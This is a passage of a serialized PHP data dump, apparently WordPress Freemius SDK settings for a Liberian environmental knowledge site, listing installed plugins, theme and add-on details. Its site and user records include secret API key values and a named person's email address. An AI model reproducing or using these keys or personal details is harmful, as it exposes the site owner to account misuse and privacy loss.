Extra\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";a:5:{s:4:\"slug\";s:23:\"all-in-one-wp-migration\";s:7:\"version\";s:3:\"7.9\";s:5:\"title\";s:23:\"All-in-One WP Migration\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:13:\"pods/init.php\";a:13:{s:4:\"Name\";s:38:\"Pods - Custom Content Types and Fields\";s:9:\"PluginURI\";s:16:\"https://pods.io/\";s:7:\"Version\";s:6:\"2.7.15\";s:11:\"Description\";s:93:\"Pods is a framework for creating, managing, and deploying customized content types and fields\";s:6:\"Author\";s:19:\"Pods Framework Team\";s:9:\"AuthorURI\";s:22:\"https://pods.io/about/\";s:10:\"TextDomain\";s:4:\"pods\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:5:\"Title\";s:38:\"Pods - Custom Content Types and Fields\";s:10:\"AuthorName\";s:19:\"Pods Framework Team\";s:9:\"is_active\";b:1;s:4:\"slug\";s:4:\"pods\";}s:41:\"ocean-posts-slider/ocean-posts-slider.php\";a:13:{s:4:\"Name\";s:18:\"Ocean Posts Slider\";s:9:\"PluginURI\";s:49:\"https://oceanwp.org/extension/ocean-posts-slider/\";s:7:\"Version\";s:6:\"1.0.13\";s:11:\"Description\";s:71:\"Display your latest posts in a beautiful slider with different options.\";s:6:\"Author\";s:7:\"OceanWP\";s:9:\"AuthorURI\";s:20:\"https://oceanwp.org/\";s:10:\"TextDomain\";s:18:\"ocean-posts-slider\";s:10:\"DomainPath\";s:11:\"/languages/\";s:7:\"Network\";b:0;s:5:\"Title\";s:18:\"Ocean Posts Slider\";s:10:\"AuthorName\";s:7:\"OceanWP\";s:9:\"is_active\";b:1;s:4:\"slug\";s:18:\"ocean-posts-slider\";}s:45:\"ocean-social-sharing/ocean-social-sharing.php\";a:13:{s:4:\"Name\";s:20:\"Ocean Social Sharing\";s:9:\"PluginURI\";s:51:\"https://oceanwp.org/extension/ocean-social-sharing/\";s:7:\"Version\";s:6:\"1.0.15\";s:11:\"Description\";s:58:\"A simple plugin to add social share buttons to your posts.\";s:6:\"Author\";s:7:\"OceanWP\";s:9:\"AuthorURI\";s:20:\"https://oceanwp.org/\";s:10:\"TextDomain\";s:20:\"ocean-social-sharing\";s:10:\"DomainPath\";s:11:\"/languages/\";s:7:\"Network\";b:0;s:5:\"Title\";s:20:\"Ocean Social Sharing\";s:10:\"AuthorName\";s:7:\"OceanWP\";s:9:\"is_active\";b:1;s:4:\"slug\";s:20:\"ocean-social-sharing\";}s:43:\"ocean-sticky-header/ocean-sticky-header.php\";a:5:{s:4:\"slug\";s:19:\"ocean-sticky-header\";s:7:\"version\";s:6:\"1.1.11\";s:5:\"title\";s:19:\"Ocean Sticky Header\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:39:\"ocean-white-label/ocean-white-label.php\";a:5:{s:4:\"slug\";s:17:\"ocean-white-label\";s:7:\"version\";s:5:\"1.0.5\";s:5:\"title\";s:17:\"Ocean White Label\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:51:\"ocean-elementor-widgets/ocean-elementor-widgets.php\";a:5:{s:4:\"slug\";s:23:\"ocean-elementor-widgets\";s:7:\"version\";s:5:\"1.1.9\";s:5:\"title\";s:23:\"Ocean Elementor Widgets\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:43:\"ocean-cookie-notice/ocean-cookie-notice.php\";a:5:{s:4:\"slug\";s:19:\"ocean-cookie-notice\";s:7:\"version\";s:5:\"1.0.4\";s:5:\"title\";s:19:\"Ocean Cookie Notice\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:33:\"duplicate-post/duplicate-post.php\";a:5:{s:4:\"slug\";s:14:\"duplicate-post\";s:7:\"version\";s:5:\"3.2.3\";s:5:\"title\";s:14:\"Duplicate Post\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:40:\"posts-table-pro/posts-data-table-pro.php\";a:5:{s:4:\"slug\";s:15:\"posts-table-pro\";s:7:\"version\";s:5:\"2.1.3\";s:5:\"title\";s:15:\"Posts Table Pro\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:81:\"all-in-one-wp-migration-file-extension/all-in-one-wp-migration-file-extension.php\";a:5:{s:4:\"slug\";s:38:\"all-in-one-wp-migration-file-extension\";s:7:\"version\";s:3:\"1.5\";s:5:\"title\";s:38:\"All-in-One WP Migration File Extension\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:49:\"content-aware-sidebars/content-aware-sidebars.php\";a:5:{s:4:\"slug\";s:22:\"content-aware-sidebars\";s:7:\"version\";s:6:\"3.10.1\";s:5:\"title\";s:22:\"Content Aware Sidebars\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:57:\"category-subcategory-list-widget/category-list-widget.php\";a:5:{s:4:\"slug\";s:32:\"category-subcategory-list-widget\";s:7:\"version\";s:3:\"4.8\";s:5:\"title\";s:32:\"Category Subcategory List Widget\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:19:\"usp-pro/usp-pro.php\";a:5:{s:4:\"slug\";s:7:\"usp-pro\";s:7:\"version\";s:3:\"3.4\";s:5:\"title\";s:7:\"USP Pro\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:59:\"intuitive-custom-post-order/intuitive-custom-post-order.php\";a:5:{s:4:\"slug\";s:27:\"intuitive-custom-post-order\";s:7:\"version\";s:5:\"3.1.2\";s:5:\"title\";s:27:\"Intuitive Custom Post Order\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:19:\"jetpack/jetpack.php\";a:5:{s:4:\"slug\";s:7:\"jetpack\";s:7:\"version\";s:3:\"7.9\";s:5:\"title\";s:24:\"Jetpack by WordPress.com\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:39:\"ocean-popup-login/ocean-popup-login.php\";a:15:{s:4:\"Name\";s:17:\"Ocean Popup Login\";s:9:\"PluginURI\";s:48:\"https://oceanwp.org/extension/ocean-popup-login/\";s:7:\"Version\";s:5:\"1.0.8\";s:11:\"Description\";s:78:\"A plugin to add a popup login, register and lost password form where you want.\";s:6:\"Author\";s:7:\"OceanWP\";s:9:\"AuthorURI\";s:20:\"https://oceanwp.org/\";s:10:\"TextDomain\";s:17:\"ocean-popup-login\";s:10:\"DomainPath\";s:11:\"/languages/\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:5:\"4.5.0\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:17:\"Ocean Popup Login\";s:10:\"AuthorName\";s:7:\"OceanWP\";s:9:\"is_active\";b:1;s:4:\"slug\";s:17:\"ocean-popup-login\";}s:51:\"wordpress-popular-posts/wordpress-popular-posts.php\";a:15:{s:4:\"Name\";s:23:\"WordPress Popular Posts\";s:9:\"PluginURI\";s:54:\"https://wordpress.org/plugins/wordpress-popular-posts/\";s:7:\"Version\";s:5:\"5.0.1\";s:11:\"Description\";s:79:\"A highly customizable widget that displays the most popular posts on your blog.\";s:6:\"Author\";s:14:\"Hector Cabrera\";s:9:\"AuthorURI\";s:26:\"https://cabrerahector.com/\";s:10:\"TextDomain\";s:23:\"wordpress-popular-posts\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:23:\"WordPress Popular Posts\";s:10:\"AuthorName\";s:14:\"Hector Cabrera\";s:9:\"is_active\";b:1;s:4:\"slug\";s:23:\"wordpress-popular-posts\";}s:25:\"gtranslate/gtranslate.php\";a:5:{s:4:\"slug\";s:10:\"gtranslate\";s:7:\"version\";s:6:\"2.8.50\";s:5:\"title\";s:10:\"GTranslate\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:31:\"everest-forms/everest-forms.php\";a:5:{s:4:\"slug\";s:13:\"everest-forms\";s:7:\"version\";s:6:\"1.5.10\";s:5:\"title\";s:13:\"Everest Forms\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:21:\"newsletter/plugin.php\";a:5:{s:4:\"slug\";s:10:\"newsletter\";s:7:\"version\";s:5:\"6.3.9\";s:5:\"title\";s:10:\"Newsletter\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:33:\"wps-hide-login/wps-hide-login.php\";a:5:{s:4:\"slug\";s:14:\"wps-hide-login\";s:7:\"version\";s:7:\"1.5.4.2\";s:5:\"title\";s:14:\"WPS Hide Login\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:34:\"tidio-live-chat/tidio-elements.php\";a:5:{s:4:\"slug\";s:15:\"tidio-live-chat\";s:7:\"version\";s:5:\"4.2.1\";s:5:\"title\";s:10:\"Tidio Chat\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:28:\"wise-chat/wise-chat-core.php\";a:5:{s:4:\"slug\";s:9:\"wise-chat\";s:7:\"version\";s:5:\"2.9.4\";s:5:\"title\";s:9:\"Wise Chat\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:41:\"post-views-counter/post-views-counter.php\";a:15:{s:4:\"Name\";s:18:\"Post Views Counter\";s:9:\"PluginURI\";s:50:\"http://www.dfactory.eu/plugins/post-views-counter/\";s:7:\"Version\";s:5:\"1.3.3\";s:11:\"Description\";s:140:\"Post Views Counter allows you to display how many times a post, page or custom post type had been viewed in a simple, fast and reliable way.\";s:6:\"Author\";s:15:\"Digital Factory\";s:9:\"AuthorURI\";s:23:\"http://www.dfactory.eu/\";s:10:\"TextDomain\";s:18:\"post-views-counter\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:18:\"Post Views Counter\";s:10:\"AuthorName\";s:15:\"Digital Factory\";s:9:\"is_active\";b:1;s:4:\"slug\";s:18:\"post-views-counter\";}}}s:11:\"all_plugins\";O:8:\"stdClass\":3:{s:9:\"timestamp\";i:1614798855;s:3:\"md5\";s:32:\"f896b1f9b42133d4d7d800b71f80f049\";s:7:\"plugins\";a:35:{s:23:\"elementor/elementor.php\";a:6:{s:4:\"slug\";s:9:\"elementor\";s:7:\"version\";s:5:\"2.7.5\";s:5:\"title\";s:9:\"Elementor\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:6:\"3.0.16\";}s:21:\"jet-blog/jet-blog.php\";a:6:{s:4:\"slug\";s:8:\"jet-blog\";s:7:\"version\";s:6:\"2.1.22\";s:5:\"title\";s:21:\"JetBlog For Elementor\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"2.2.0\";}s:29:\"jet-elements/jet-elements.php\";a:6:{s:4:\"slug\";s:12:\"jet-elements\";s:7:\"version\";s:5:\"2.1.4\";s:5:\"title\";s:25:\"JetElements For Elementor\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"2.4.1\";}s:25:\"jet-search/jet-search.php\";a:6:{s:4:\"slug\";s:10:\"jet-search\";s:7:\"version\";s:5:\"2.0.1\";s:5:\"title\";s:23:\"JetSearch For Elementor\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"2.1.8\";}s:39:\"jet-smart-filters/jet-smart-filters.php\";a:6:{s:4:\"slug\";s:17:\"jet-smart-filters\";s:7:\"version\";s:5:\"1.5.0\";s:5:\"title\";s:15:\"JetSmartFilters\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"1.8.3\";}s:27:\"ocean-extra/ocean-extra.php\";a:6:{s:4:\"slug\";s:11:\"ocean-extra\";s:7:\"version\";s:6:\"1.5.18\";s:5:\"title\";s:11:\"Ocean Extra\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"1.7.3\";}s:13:\"pods/init.php\";a:6:{s:4:\"slug\";s:4:\"pods\";s:7:\"version\";s:6:\"2.7.15\";s:5:\"title\";s:38:\"Pods - Custom Content Types and Fields\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:6:\"2.7.26\";}s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";a:6:{s:4:\"slug\";s:23:\"all-in-one-wp-migration\";s:7:\"version\";s:3:\"7.9\";s:5:\"title\";s:23:\"All-in-One WP Migration\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:4:\"7.38\";}s:41:\"ocean-modal-window/ocean-modal-window.php\";a:6:{s:4:\"slug\";s:18:\"ocean-modal-window\";s:7:\"version\";s:6:\"1.0.14\";s:5:\"title\";s:18:\"Ocean Modal Window\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"1.1.0\";}s:41:\"ocean-posts-slider/ocean-posts-slider.php\";a:6:{s:4:\"slug\";s:18:\"ocean-posts-slider\";s:7:\"version\";s:6:\"1.0.13\";s:5:\"title\";s:18:\"Ocean Posts Slider\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"1.1.0\";}s:45:\"ocean-social-sharing/ocean-social-sharing.php\";a:6:{s:4:\"slug\";s:20:\"ocean-social-sharing\";s:7:\"version\";s:6:\"1.0.15\";s:5:\"title\";s:20:\"Ocean Social Sharing\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"1.1.0\";}s:43:\"ocean-sticky-header/ocean-sticky-header.php\";a:6:{s:4:\"slug\";s:19:\"ocean-sticky-header\";s:7:\"version\";s:6:\"1.1.11\";s:5:\"title\";s:19:\"Ocean Sticky Header\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"1.2.0\";}s:39:\"ocean-white-label/ocean-white-label.php\";a:6:{s:4:\"slug\";s:17:\"ocean-white-label\";s:7:\"version\";s:5:\"1.0.5\";s:5:\"title\";s:17:\"Ocean White Label\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"1.0.6\";}s:39:\"ocean-popup-login/ocean-popup-login.php\";a:6:{s:4:\"slug\";s:17:\"ocean-popup-login\";s:7:\"version\";s:5:\"1.0.8\";s:5:\"title\";s:17:\"Ocean Popup Login\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"1.2.0\";}s:51:\"ocean-elementor-widgets/ocean-elementor-widgets.php\";a:6:{s:4:\"slug\";s:23:\"ocean-elementor-widgets\";s:7:\"version\";s:5:\"1.1.9\";s:5:\"title\";s:23:\"Ocean Elementor Widgets\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"1.2.3\";}s:43:\"ocean-cookie-notice/ocean-cookie-notice.php\";a:6:{s:4:\"slug\";s:19:\"ocean-cookie-notice\";s:7:\"version\";s:5:\"1.0.4\";s:5:\"title\";s:19:\"Ocean Cookie Notice\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"1.0.5\";}s:33:\"duplicate-post/duplicate-post.php\";a:6:{s:4:\"slug\";s:14:\"duplicate-post\";s:7:\"version\";s:5:\"3.2.3\";s:5:\"title\";s:14:\"Duplicate Post\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"4.1.1\";}s:40:\"posts-table-pro/posts-data-table-pro.php\";a:6:{s:4:\"slug\";s:15:\"posts-table-pro\";s:7:\"version\";s:5:\"2.1.3\";s:5:\"title\";s:15:\"Posts Table Pro\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"2.2.1\";}s:81:\"all-in-one-wp-migration-file-extension/all-in-one-wp-migration-file-extension.php\";a:6:{s:4:\"slug\";s:38:\"all-in-one-wp-migration-file-extension\";s:7:\"version\";s:3:\"1.5\";s:5:\"title\";s:38:\"All-in-One WP Migration File Extension\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:3:\"1.7\";}s:49:\"content-aware-sidebars/content-aware-sidebars.php\";a:6:{s:4:\"slug\";s:22:\"content-aware-sidebars\";s:7:\"version\";s:6:\"3.10.1\";s:5:\"title\";s:22:\"Content Aware Sidebars\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:6:\"3.15.1\";}s:57:\"category-subcategory-list-widget/category-list-widget.php\";a:6:{s:4:\"slug\";s:32:\"category-subcategory-list-widget\";s:7:\"version\";s:3:\"4.8\";s:5:\"title\";s:32:\"Category Subcategory List Widget\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:3:\"5.4\";}s:19:\"usp-pro/usp-pro.php\";a:6:{s:4:\"slug\";s:7:\"usp-pro\";s:7:\"version\";s:3:\"3.4\";s:5:\"title\";s:7:\"USP Pro\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:3:\"3.9\";}s:59:\"intuitive-custom-post-order/intuitive-custom-post-order.php\";a:6:{s:4:\"slug\";s:27:\"intuitive-custom-post-order\";s:7:\"version\";s:5:\"3.1.2\";s:5:\"title\";s:27:\"Intuitive Custom Post Order\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:7:\"3.1.2.1\";}s:19:\"jetpack/jetpack.php\";a:6:{s:4:\"slug\";s:7:\"jetpack\";s:7:\"version\";s:3:\"7.9\";s:5:\"title\";s:24:\"Jetpack by WordPress.com\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:3:\"9.4\";}s:41:\"post-views-counter/post-views-counter.php\";a:6:{s:4:\"slug\";s:18:\"post-views-counter\";s:7:\"version\";s:5:\"1.3.1\";s:5:\"title\";s:18:\"Post Views Counter\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"1.3.3\";}s:51:\"wordpress-popular-posts/wordpress-popular-posts.php\";a:6:{s:4:\"slug\";s:23:\"wordpress-popular-posts\";s:7:\"version\";s:5:\"5.0.1\";s:5:\"title\";s:23:\"WordPress Popular Posts\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"5.2.4\";}s:25:\"gtranslate/gtranslate.php\";a:6:{s:4:\"slug\";s:10:\"gtranslate\";s:7:\"version\";s:6:\"2.8.50\";s:5:\"title\";s:10:\"GTranslate\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:6:\"2.8.61\";}s:31:\"everest-forms/everest-forms.php\";a:6:{s:4:\"slug\";s:13:\"everest-forms\";s:7:\"version\";s:6:\"1.5.10\";s:5:\"title\";s:13:\"Everest Forms\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"1.7.3\";}s:21:\"newsletter/plugin.php\";a:6:{s:4:\"slug\";s:10:\"newsletter\";s:7:\"version\";s:5:\"6.3.9\";s:5:\"title\";s:10:\"Newsletter\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"7.0.3\";}s:33:\"wps-hide-login/wps-hide-login.php\";a:6:{s:4:\"slug\";s:14:\"wps-hide-login\";s:7:\"version\";s:7:\"1.5.4.2\";s:5:\"title\";s:14:\"WPS Hide Login\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"1.8.3\";}s:48:\"wp-live-chat-software-for-wordpress/livechat.php\";a:6:{s:4:\"slug\";s:35:\"wp-live-chat-software-for-wordpress\";s:7:\"version\";s:5:\"4.4.0\";s:5:\"title\";s:8:\"LiveChat\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"4.4.3\";}s:34:\"tidio-live-chat/tidio-elements.php\";a:5:{s:4:\"slug\";s:15:\"tidio-live-chat\";s:7:\"version\";s:5:\"4.2.1\";s:5:\"title\";s:10:\"Tidio Chat\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:28:\"wise-chat/wise-chat-core.php\";a:6:{s:4:\"slug\";s:9:\"wise-chat\";s:7:\"version\";s:5:\"2.9.4\";s:5:\"title\";s:9:\"Wise Chat\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"2.9.5\";}s:32:\"wp-image-zoooom/image-zoooom.php\";a:6:{s:4:\"slug\";s:15:\"wp-image-zoooom\";s:7:\"version\";s:4:\"1.44\";s:5:\"title\";s:13:\"WP Image Zoom\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:6:\"1.45.1\";}s:69:\"video-conferencing-with-zoom-api/video-conferencing-with-zoom-api.php\";a:6:{s:4:\"slug\";s:32:\"video-conferencing-with-zoom-api\";s:7:\"version\";s:6:\"3.6.20\";s:5:\"title\";s:28:\"Video Conferencing with Zoom\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:6:\"3.6.31\";}}}s:10:\"all_themes\";O:8:\"stdClass\":3:{s:9:\"timestamp\";i:1615448634;s:3:\"md5\";s:32:\"d94e1bc712cd957b606ffd01a99ed69a\";s:6:\"themes\";a:1:{s:7:\"oceanwp\";a:5:{s:4:\"slug\";s:7:\"oceanwp\";s:7:\"version\";s:5:\"1.7.3\";s:5:\"title\";s:7:\"OceanWP\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}}}s:11:\"theme_sites\";a:1:{s:7:\"oceanwp\";O:7:\"FS_Site\":26:{s:7:\"site_id\";s:8:\"14216742\";s:9:\"plugin_id\";s:4:\"3752\";s:7:\"user_id\";s:7:\"2372438\";s:5:\"title\";s:41:\"Environmental Knowledge Management System\";s:3:\"url\";s:24:\"https://ekmsliberia.info\";s:7:\"version\";s:5:\"1.7.3\";s:8:\"language\";s:5:\"en-US\";s:16:\"platform_version\";s:3:\"5.3\";s:11:\"sdk_version\";s:7:\"2.3.0.4\";s:28:\"programming_language_version\";s:6:\"7.2.24\";s:7:\"plan_id\";s:4:\"6040\";s:10:\"license_id\";N;s:13:\"trial_plan_id\";N;s:10:\"trial_ends\";N;s:10:\"is_premium\";b:0;s:15:\"is_disconnected\";b:0;s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;s:7:\"is_beta\";N;s:10:\"public_key\";s:32:\"pk_dcddd9f672d0617fbc35ed62db01b\";s:10:\"secret_key\";s:32:\"sk_7pN{JTNe8kmJc:*?Urq_%GjQ#k83e\";s:2:\"id\";s:7:\"3392675\";s:7:\"updated\";s:19:\"2019-11-14 06:07:17\";s:7:\"created\";s:19:\"2019-11-08 06:26:09\";s:22:\"\0FS_Entity\0_is_updated\";b:0;s:7:\"charset\";s:5:\"UTF-8\";}}s:5:\"users\";a:1:{i:2372438;O:7:\"FS_User\":13:{s:5:\"email\";s:24:\"contact@ekmsliberia.info\";s:5:\"first\";s:6:\"Trokon\";s:4:\"last\";s:6:\"Saykpa\";s:11:\"is_verified\";b:1;s:11:\"customer_id\";N;s:5:\"gross\";i:0;s:10:\"public_key\";s:32:\"pk_6c431624ddfee487662be02d21084\";s:10:\"secret_key\";s:32:\"sk_56d)beE8IY2*LLwJ8@qw679P6_]2o\";s:2:\"id\";s:7:\"2372438\";s:7:\"updated\";N;s:7:\"created\";s:19:\"2019-11-08 06:26:08\";s:22:\"\0FS_Entity\0_is_updated\";b:0;s:7:\"is_beta\";b:0;}}s:6:\"addons\";a:2:{i:3752;a:22:{i:0;O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:20:\"Ocean Footer Callout\";s:4:\"slug\";s:20:\"ocean-footer-callout\";s:12:\"premium_slug\";s:20:\"ocean-footer-callout\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";N;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";i:2;s:4:\"file\";N;s:7:\"version\";N;s:11:\"auto_update\";N;s:4:\"info\";O:14:\"FS_Plugin_Info\":13:{s:9:\"plugin_id\";s:4:\"3754\";s:11:\"description\";s:280:\"<ul>\n<li>Display/hide the callout on any page/post</li>\n<li>Edit the content and button url on any page/post</li>\n<li>Display the page content on the callout</li>\n<li>Enable/disable the callout button</li>\n<li>Add your own padding top/bottom</li>\n<li>Add your own color</li> </ul>\";s:17:\"short_description\";s:65:\"Add some important information about your company in your footer.\";s:10:\"banner_url\";s:61:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3754/banner.png\";s:15:\"card_banner_url\";s:66:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3754/card_banner.png\";s:15:\"selling_point_0\";s:41:\"Display/hide the callout on any page/post\";s:15:\"selling_point_1\";s:48:\"Edit the content and button url on any page/post\";s:15:\"selling_point_2\";s:39:\"Display the page content on the callout\";s:11:\"screenshots\";O:8:\"stdClass\":3:{s:12:\"screenshot_0\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3754/screenshots/0.png\";s:12:\"screenshot_1\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3754/screenshots/1.png\";s:12:\"screenshot_2\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3754/screenshots/2.png\";}s:2:\"id\";s:3:\"821\";s:7:\"updated\";s:19:\"2019-08-04 06:53:40\";s:7:\"created\";s:19:\"2019-05-16 04:54:10\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_c3ff094ed1cbaf287c6f833d3ba09\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3754\";s:7:\"updated\";s:19:\"2021-08-15 20:09:21\";s:7:\"created\";s:19:\"2019-05-06 13:24:01\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:1;O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:19:\"Ocean Sticky Header\";s:4:\"slug\";s:19:\"ocean-sticky-header\";s:12:\"premium_slug\";s:19:\"ocean-sticky-header\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";N;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";i:4;s:4:\"file\";N;s:7:\"version\";N;s:11:\"auto_update\";N;s:4:\"info\";O:14:\"FS_Plugin_Info\":13:{s:9:\"plugin_id\";s:4:\"3755\";s:11:\"description\";s:512:\"<ul>\n<li>Stick manually, perfect for the Custom Header style</li>\n<li>Fixed the top bar</li>\n<li>Add sticky mobile</li>\n<li>Choose between two sticky styles: Shrink or Fixed</li>\n<li>Choose between two sticky effects</li>\n<li>Enter the height of the header during scroll for the shrink style</li>\n<li>Add logo when scrolling</li>\n<li>Enter the height of the logo during scroll for the shrink style</li>\n<li>Choose the header opacity during scroll</li>\n<li>Choose the background and color during scroll</li> </ul>\";s:17:\"short_description\";s:63:\"Attach an eye-catching header at the top of your website pages.\";s:10:\"banner_url\";s:61:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3755/banner.png\";s:15:\"card_banner_url\";s:66:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3755/card_banner.png\";s:15:\"selling_point_0\";s:51:\"Stick manually, perfect for the Custom Header style\";s:15:\"selling_point_1\";s:17:\"Fixed the top bar\";s:15:\"selling_point_2\";s:17:\"Add sticky mobile\";s:11:\"screenshots\";O:8:\"stdClass\":2:{s:12:\"screenshot_0\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3755/screenshots/0.png\";s:12:\"screenshot_2\";s:68:\"//s3-us-west-2.amazonaws.com/freemius/plugins/3755/screenshots/2.png\";}s:2:\"id\";s:3:\"829\";s:7:\"updated\";s:19:\"2019-08-04 07:27:06\";s:7:\"created\";s:19:\"2019-05-16 05:01:04\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_21f01f3d0a79bcd65042e3c332188\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3755\";s:7:\"updated\";s:19:\"2021-08-15 20:31:40\";s:7:\"created\";s:19:\"2019-05-06 13:27:16\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:2;O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:16:\"Ocean Side 